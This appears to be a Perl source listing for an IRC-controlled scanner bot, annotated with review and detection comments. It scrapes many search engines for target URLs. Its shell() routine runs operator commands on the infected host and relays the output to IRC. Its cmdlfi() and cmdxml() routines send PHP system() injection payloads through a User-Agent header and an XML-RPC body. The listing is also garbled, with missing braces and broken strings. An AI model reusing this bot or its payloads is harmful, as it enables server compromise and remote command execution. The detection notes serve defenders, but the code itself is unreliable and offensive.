# NOTE(review): $b is the package variable here (no `my`). Closing braces are
# missing in this listing.
sub sapo(){

my @list;

my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://pesquisa.sapo.pt/?
barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".
$b."&q=".&key($key)."&st=local");

my $res = &search_engine_query($search);

# No next-page label: stop paging.
if ($res !~ m/Next/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {


if ($1 !~ /\.sapo\.pt/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# duck(key): page through the DuckDuckGo HTML endpoint (s and dc = 1..50),
# capture the URL text after "http://" in each anchor, skip captures
# containing "duckduckgo", expand with &links and return the list.
# Paging stops early on the "No more results" message.
# NOTE(review): closing braces are missing in this listing.
sub duck() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://duckduckgo.com/html/?
q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");

my $res = &search_engine_query($search);

# End-of-results message: stop paging.
if ($res =~ m/No more results/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {


if ($1 !~ /duckduckgo/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# lygo(key): second hotbot.com scraper, using provider "lygo" and the page2
# parameter (0..50). Captures the URL text after "http://" from anchors that
# are immediately followed by an <img tag, skips hotbot.com captures, expands
# with &links and returns the list.
# Paging stops early on the "had no web result" message.
# NOTE(review): closing braces are missing in this listing.
sub lygo() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");

my $res = &search_engine_query($search);

# "No results" page: stop paging.
if ($res =~ m/had no web result/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {


if ($1 !~ /hotbot\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# yause(key): page through yauba.com results (pg = 1..50), capture the URL
# text after "http://" from nofollow anchors inside <h1>, skip yauba.com
# captures, expand with &links and return the list.
# Paging stops early when the page does not contain "Next" (case-insensitive).
# NOTE(review): the URL string and the result regex both contain line breaks
# as printed here, which are part of the string/pattern. Closing braces are
# missing in this listing.
sub yause() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.yauba.com/?
query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&p
g=".$b);

my $res = &search_engine_query($search);

# No next-page label: stop paging.
if ($res !~ m/Next/i) {$b=50;}

while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\"


onfocus=/g) {
if ($1 !~ /yauba\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# baidu(key): page through baidu.com results (pn = 0..500 in steps of 10),
# capture the URL text after "http://" from anchors followed by a target
# attribute, skip baidu.com captures, expand with &links and return the list.
# NOTE(review): closing braces are missing in this listing.
sub baidu() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {

if ($1 !~ /baidu\.com/){

my $link = $1;
my @grep = &links($link);

push(@list,@grep);

return @list;

# kipot(key): page through qkport.com results (page number 1..50 is part of
# the URL path), capture the URL text after "http://" from anchors with
# target="_top", skip qkport.com captures, expand with &links and return the
# list.
# NOTE(review): closing braces are missing in this listing.
sub kipot() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.qkport.com/".$b."/web/".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {

if ($1 !~ /qkport\.com/){

my $link = $1;

my @grep = &links($link);
push(@list,@grep);

return @list;

# gibla(key): scrape gigablast.com results. While the current page contains
# "Next 10 Results", collect the contents of every "url" span via &links, take
# the first centred anchor's href as the next page path, and fetch again.
# Returns the collected list.
# NOTE(review): $search is rebuilt from $hal BEFORE $hal is updated inside the
# loop, so each fetch uses the path found on the previous iteration. Nothing
# is collected from a page that lacks the "Next 10 Results" text, including a
# single-page result. The closing brace of the sub is missing in this listing.
sub gibla() { # "mati" (dead) - presumably marks this scraper as no longer working

my @list;

my $key = $_[0];

my $hal = "/search?q=".&key($key);

my $search = ("http://www.gigablast.com".$hal);

my $res = &search_engine_query($search);

while ($res =~ m/Next 10 Results/) {

$search = ("http://www.gigablast.com".$hal);

while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
# Path of the next page, taken from the first centred link.
if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }

$res = &search_engine_query($search);

}return @list;

# black(key): page through blekko.com results (p = 0..50), capture the URL
# text after "http://" from "UrlTitleLine" anchors, skip captures containing
# "blekko", expand with &links and return the list.
# Paging stops early when the page does not show the current page number in
# a <strong> element.
# NOTE(review): $cek is computed as $b+1 but never used; the stop check uses
# $b itself. The closing brace of the sub is missing in this listing.
sub black() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);

my $cek = $b+1;

my $res = &search_engine_query($search);

# Current page number not highlighted: stop paging.
if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}

while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /blekko/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
}

return @list;

# onet: harvest candidate site URLs from szukaj.onet.pl for one search phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /webcache|query/.
# NOTE(review): some closing braces are missing from this listing (apparently
# lost in page extraction); nesting is inferred from the statement order.
# Defender note: one call requests pages 1..50 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub onet() {

my @list;

my $key = $_[0];

my $b = 0;

# The page number precedes ",query.html" in the path.
for ($b=1; $b<=50; $b+=1) {

my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));

my $res = &search_engine_query($search);

# Any anchor with an http:// href is a candidate.
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

# Drop cache links and the engine's own query links.
if ($1 !~ /webcache|query/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
}

return @list;

# sizuka: harvest candidate site URLs from szukacz.pl for one search phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /szukacz/.
# NOTE(review): the URL string literal below is split across two lines in this
# listing (page wrapping), and most closing braces are missing; nesting is
# inferred from the statement order.
# Defender note: one call requests start=10,20,...,100 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub sizuka() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=10; $b<=100; $b+=10) {

my $search = ("http://www.szukacz.pl/szukaj.aspx?
ct=polska&pc=polska&q=".&key($key)."&start=".$b);

my $res = &search_engine_query($search);

# The result URL is read from the anchor's title attribute.
while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /szukacz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;
}

# walla: harvest candidate site URLs from search.walla.co.il for one phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /walla\.co\.il/.
# NOTE(review): most closing braces are missing from this listing (apparently
# lost in page extraction); nesting is inferred from the statement order.
# Defender note: one call requests p=0..50 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub walla() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".
$b);

my $res = &search_engine_query($search);

# Results are anchors inside <td class=sw> cells.
while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /walla\.co\.il/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
# demos: harvest candidate site URLs from search.dmoz.org for one phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /search|dmoz/.
# NOTE(review): the URL string literal below is split across two lines in this
# listing (page wrapping), and most closing braces are missing; nesting is
# inferred from the statement order.
# Defender note: one call requests start=0,10,...,500 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub demos() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://search.dmoz.org/search/search?
q=".&key($key)."&start=".$b."&type=next&all=yes");

my $res = &search_engine_query($search);

# Any anchor with an http:// href is a candidate.
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

# Drop the directory's own links and anything containing "search".
if ($1 !~ /search|dmoz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
# rose: harvest candidate site URLs from euroseek.com for one search phrase,
# repeating the query under several interface languages.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /euroseek/.
# NOTE(review): the loop variable $language is never used; each pass instead
# draws $lang at random from @langs, so a language can repeat or be skipped.
# $lang is not declared with "my" in this block. Most closing braces are
# missing from this listing; nesting is inferred from the statement order.
# Defender note: one call can issue 14 x 4 requests (start=0,10,20,30 per pass)
# through search_engine_query(), plain HTTP/1.0 on port 80.
sub rose() {

my @list;

my $key = $_[0];

my $b = 0;

my @langs =
("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");

# One pass per list entry, but the language actually sent is a random pick.
foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];

for ($b=0; $b<=30; $b+=10) {

my $search = ("http://euroseek.com/system/search.cgi?language=".
$lang."&mode=internet&start=".$b."&string=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /euroseek/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}return @list;

}
# seznam: harvest candidate site URLs from search.seznam.cz for one phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /seznam/.
# NOTE(review): $b is not declared with "my" here, so the loop counter is a
# package variable. The URL string literal is split across two lines in this
# listing (page wrapping), and the closing braces are missing.
# Defender note: one call requests from=1,11,...,491 in sequence with a fixed
# pId value in the query string, through search_engine_query() (plain HTTP/1.0
# on port 80).
sub seznam() {

my @list;

my $key = $_[0];

for ($b=1; $b<=500; $b+=10) {

my $search = ("http://search.seznam.cz/?
q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /seznam/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# tiscali: harvest candidate site URLs from search.tiscali.it for one phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /tiscali/.
# NOTE(review): $b is not declared with "my" here, so the loop counter is a
# package variable. The URL string literal is split across two lines in this
# listing (page wrapping), and the closing braces are missing.
# Defender note: one call requests start=0,10,...,500 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub tiscali() {

my @list;
my $key = $_[0];

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://search.tiscali.it/?
tiscalitype=web&collection=web&start=".$b."&q=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /tiscali/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# naver: harvest candidate site URLs from web.search.naver.com for one phrase.
#   $_[0]   search phrase; escaped by key().
#   Returns the strings produced by links() for every captured URL that does
#   not match /naver/.
# NOTE(review): $b is not declared with "my" here, so the loop counter is a
# package variable. The URL string literal is split across three lines in this
# listing (page wrapping), and the closing braces are missing.
# Defender note: one call requests start=1,11,...,491 in sequence through
# search_engine_query(), plain HTTP/1.0 on port 80.
sub naver() {

my @list;

my $key = $_[0];

for ($b=1; $b<=500; $b+=10) {


my $search = ("http://web.search.naver.com/search.naver?
where=webkr&query=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start
=".$b."&display=10");

my $res = &search_engine_query($search);

# Any anchor with an http:// href is a candidate.
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

# Skip links that point back to the search engine itself.
if ($1 !~ /naver/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

#########################################

# clean: de-duplicate a list of URL strings, keeping first occurrences in order.
#   @_      the strings to filter.
#   Returns the list of distinct strings after slash normalisation.
# Each element has runs of "/" collapsed to a single "/" before comparison.
# Because foreach aliases the elements of @_, that substitution also changes
# the caller's values in place.
# NOTE(review): the closing braces of the loop and the sub are missing from
# this listing (apparently lost in page extraction).
sub clean() {

my @cln = ();

# Strings already emitted; the count doubles as a "seen" flag.
my %visit = ();
foreach my $element (@_) {

$element =~ s/\/+/\//g;

# Post-increment is false only the first time a string is met.
next if $visit{$element}++;

push @cln, $element;

return @cln;

# key: escape a search phrase for use inside a query string.
#   $_[0]   the raw phrase.
#   Returns a copy with spaces turned into "+" and a fixed set of punctuation
#   characters turned into their %XX form.
# Only the characters listed below are rewritten; everything else, including
# "%" itself, passes through unchanged. The "?" substitution appears twice;
# the second has nothing left to replace.
# NOTE(review): the sub's closing brace is missing from this listing.
sub key() {

my $dork = $_[0];

$dork =~ s/ /\+/g;

$dork =~ s/:/\%3A/g;

$dork =~ s/\//\%2F/g;

$dork =~ s/\?/\%3F/g;

$dork =~ s/&/\%26/g;

$dork =~ s/\"/\%22/g;

$dork =~ s/,/\%2C/g;

$dork =~ s/\\/\%5C/g;

$dork =~ s/@/\%40/g;

$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;

$dork =~ s/\?/\%3F/g;

$dork =~ s/\=/\%3D/g;

$dork =~ s/\|/\%7C/g;

return $dork;

# links: expand one captured URL into three path variants.
#   $_[0]   a URL as captured by the search subs, i.e. without the leading
#           "http://".
#   Returns a three-element list: the URL itself, its host part, and its
#   parent directory, each with a trailing "/" appended and each "//" then
#   replaced by "/" in a single pass.
# NOTE(review): the sub's closing brace is missing from this listing.
sub links() {

my @list;

my $link = $_[0];

my $host = $_[0];

my $hdir = $_[0];

# Parent directory: drop everything after the last "/".
$hdir =~ s/(.*)\/[^\/]*$/$1/;

# Host: keep the first run of host-name characters that precedes a "/".
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

$host .= "/";

$link .= "/";

$hdir .= "/";

$host =~ s/\/\//\//g;

$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;

push(@list,$link,$host,$hdir);

return @list;

# search_engine_query: fetch one URL over a raw TCP socket and return the reply.
#   $_[0]   absolute http:// URL.
#   Returns the whole response (status line, headers and body) as one string,
#   with the lines read from the socket joined by the list separator; returns
#   "" when the connection cannot be opened or the eval block dies.
# The request is a bare HTTP/1.0 GET to port 80 carrying exactly three headers:
# Host, "Accept: */*" and a User-Agent taken from $uagent, which is not set in
# this block. HEAD lists @uagents as a pool of legacy browser strings;
# presumably $uagent is drawn from it elsewhere.
# No timeout is set on the socket here, and errors inside eval are discarded.
# NOTE(review): $host is interpolated into the substitution as a pattern, so
# its dots match any character. The line breaks inside the socket call and the
# request string appear to come from page wrapping. The sub's closing brace is
# missing from this listing.
# Defender note: HTTP/1.0 requests with only these three headers and an
# outdated browser User-Agent are a usable traffic fingerprint for this fetcher.
sub search_engine_query($) {

my $url = $_[0];

$url =~ s/http:\/\///;

my $host = $url;

my $query = $url;

my $page = "";

$host =~ s/href=\"?http:\/\///;

$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

# What remains after removing the host is the request path and query.
$query =~ s/$host//;

if ($query eq "") { $query = "/"; }

eval {

# "or return" leaves only the eval block; $page then stays empty.
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80",


Proto=>"tcp") or return;

print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-


Agent: $uagent\r\n\r\n";

# Read until the server closes the connection.
my @pages = <$sock>;
$page = "@pages";

close($sock);

};

return $page;

#########################################

# shell: run an operator-supplied command on the host running this script and
# relay its output to IRC.
#   $_[0]   IRC target (channel or nick) that receives the output via msg().
#   $_[1]   command line, used without any validation.
# A command matching "cd <dir>" is handled with chdir() in the script's own
# process. Anything else is run through backticks, i.e. handed to the system
# shell, with stderr and descriptor 3 redirected into the captured output.
# The parent forks and waits; the child forks again and exits at once, so the
# grandchild that runs the command is detached from the main process.
# Output is sent line by line, pausing 2 seconds after every 5 lines.
# NOTE(review): $pid is not declared with "my" in this block. chop removes the
# last character of each line whatever it is. Several closing braces are
# missing from this listing (apparently lost in page extraction).
# Defender note: on an affected host this shows up as short-lived shell
# children spawned by a perl process. HEAD defines $fakeproc as
# "/usr/sbin/apache3 -k start"; if the script renames itself to that value
# (not visible here), a process with that name and no matching binary on disk
# is an indicator.
sub shell() {

my $path = $_[0];

my $cmd = $_[1];

if ($cmd =~ /cd (.*)/) {

chdir("$1") || &msg("$path","#4,1No such file or directory");

return;

elsif ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

my @output = `$cmd 2>&1 3>&1`;

# Lines sent since the last pause.
my $c = 0;

foreach my $output (@output) {


$c++;

chop $output;

&msg("$path","$output");

if ($c == 5) { $c = 0; sleep 2; }

exit;

}}

# isAdmin: report whether a nickname is the configured operator.
#   $_[0]   IRC nickname to test.
#   Returns 1 when it is string-equal to $admin, otherwise 0.
# $admin is defined at the top of the file (see HEAD); the comparison is the
# only check made here, so control is tied to the nickname alone.
# NOTE(review): the sub's closing brace is missing from this listing.
sub isAdmin() {

my $status = 0;

my $nick = $_[0];

if ($nick eq $admin) { $status = 1; }

return $status;

# msg: send an IRC PRIVMSG.
#   $_[0]   target channel or nick.
#   $_[1]   message text.
# Does nothing unless exactly two arguments are given. The line is handed to
# sendraw() together with $IRC_cur_socket; both are defined outside this block.
sub msg() {

# $#_ is the last index of @_, so 1 means two arguments.
return unless $#_ == 1;

sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");

}
# nick: send an IRC NICK command to change the bot's nickname.
#   $_[0]   the new nickname.
# Does nothing unless exactly one argument is given. sendraw() is defined
# outside this block.
# NOTE(review): the sub's closing brace is missing from this listing.
sub nick() {

# $#_ is the last index of @_, so 0 means one argument.
return unless $#_ == 0;

sendraw("NICK $_[0]");

# notice: send an IRC NOTICE.
#   $_[0]   target channel or nick.
#   $_[1]   notice text.
# Does nothing unless exactly two arguments are given. sendraw() is defined
# outside this block.
# NOTE(review): the sub's closing brace is missing from this listing.
sub notice() {

# $#_ is the last index of @_, so 1 means two arguments.
return unless $#_ == 1;

sendraw("NOTICE $_[0] :$_[1]");

# cmdlfi: send one HTTP GET whose User-Agent header carries a PHP snippet, and
# report whatever the response echoes back between two marker strings.
#   $_[0]   URL to request.
#   $_[1]   command text placed inside the PHP system() call.
#   $_[2]   IRC target that receives the result via msg().
# The User-Agent value is the marker "j13mbut", a PHP open tag calling system()
# on the command with stderr redirected, and the marker again. The response
# body is searched for text between the two markers; that text, or
# "No Output", is posted to IRC. The request timeout is 7 seconds.
# NOTE(review): $response is not declared with "my" in this block, and the
# closing braces of the else branch and the sub are missing from this listing.
# Defender note: a User-Agent containing "<?" or the literal "j13mbut" in web
# server logs is a direct indicator of this routine. The snippet can only run
# if the server later interprets a file that recorded the header, so keeping
# request-controlled paths out of include/require calls removes the
# precondition.
sub cmdlfi() {

my $browser = LWP::UserAgent->new;

my $url = $_[0];

my $cmd = $_[1];

my $chan = $_[2];

my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";

$browser->agent("$hie");

$browser->timeout(7);
$response = $browser->get( $url );

# /s lets the captured output span several lines.
if ($response->content =~ /j13mbut(.*)j13mbut/s) {

&msg("$chan","#15,1(#4@9CMDLFI#15)#9 $1#");

} else {

&msg("$chan","#15,1(#4@9CMDLFI#15)#4 No Output#");

# cmdxml: POST a crafted XML-RPC methodCall to a URL and report whatever the
# response echoes back between two marker strings.
#   $_[0]   URL of the XML-RPC endpoint to post to.
#   $_[1]   command text placed inside a PHP system() call in the payload.
#   $_[2]   IRC target that receives the result via msg().
# The body is a <methodCall> for "test.method" whose single parameter name
# closes a quoted string and appends PHP that echoes "bamby", calls system()
# on the command, echoes "solo" and exits. The response body is searched for
# text between "bamby" and "solo"; that text, or "No Output", is posted to IRC.
# The request is sent with the User-Agent "perl post" and Content-Type
# text/xml.
# NOTE(review): $exploit is not declared with "my" in this block; the POST
# call is split across lines by page wrapping; the closing braces of the else
# branch and the sub are missing from this listing. Which server-side library
# is targeted is not stated on this page.
# Defender note: XML-RPC request bodies whose <name> element contains quote
# characters, "system(" or the literals "bamby"/"solo", and requests with the
# User-Agent "perl post", are indicators of this routine.
sub cmdxml() {

my $jed = $_[0];

my $dwa = $_[1];

my $chan = $_[2];

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

$exploit .= "echo'bamby';system('".
$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";

my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content =>


$exploit);

# /s lets the captured output span several lines.
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","#15,1(#4@9CMDXML#15)#9 $1#");

} else {

&msg("$chan","#15,1(#4@9CMDXML#15)#4 No Output#");
